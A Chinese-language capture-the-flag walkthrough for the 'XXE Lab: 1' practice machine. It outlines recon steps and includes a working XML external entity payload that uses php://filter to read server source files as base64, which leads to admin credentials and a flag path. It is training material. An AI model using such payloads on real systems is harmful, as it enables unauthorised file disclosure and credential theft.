文章目录
靶机文档:XXE Lab: 1
下载地址:Download (Mirror)
告诉了利用点:http://your-ip/xxe
信息收集
主机发现
端口扫描
目录扫描
访问robots.txt
访问/xxe
随意输入账密,登陆抓包
看到登陆的格式就是XML语言的数据格式
漏洞利用
payload:
xml
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=xxe.php">
]>
<root><name>&admin;</name><password>hj</password></root>
将选中base64格式的数据,发送到Decoder模块,去解码
刚才robots.txt文件里还显示有一个admin.php,尝试读取一下
解码发现了用户名和密码
用户名:administhebest
密码解密后是admin@123
还发现了/flagmoout.php
先用得到的账密进行登陆
也跳转到了/flagmeout.php
base64解码后得到一串base32格式的数据
JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5
解码后得到base64格式的
再进行base64解码,得到一个路径,再次外部实体注入
运行需要php版本较低 ,高版本会报错,导致出不来结果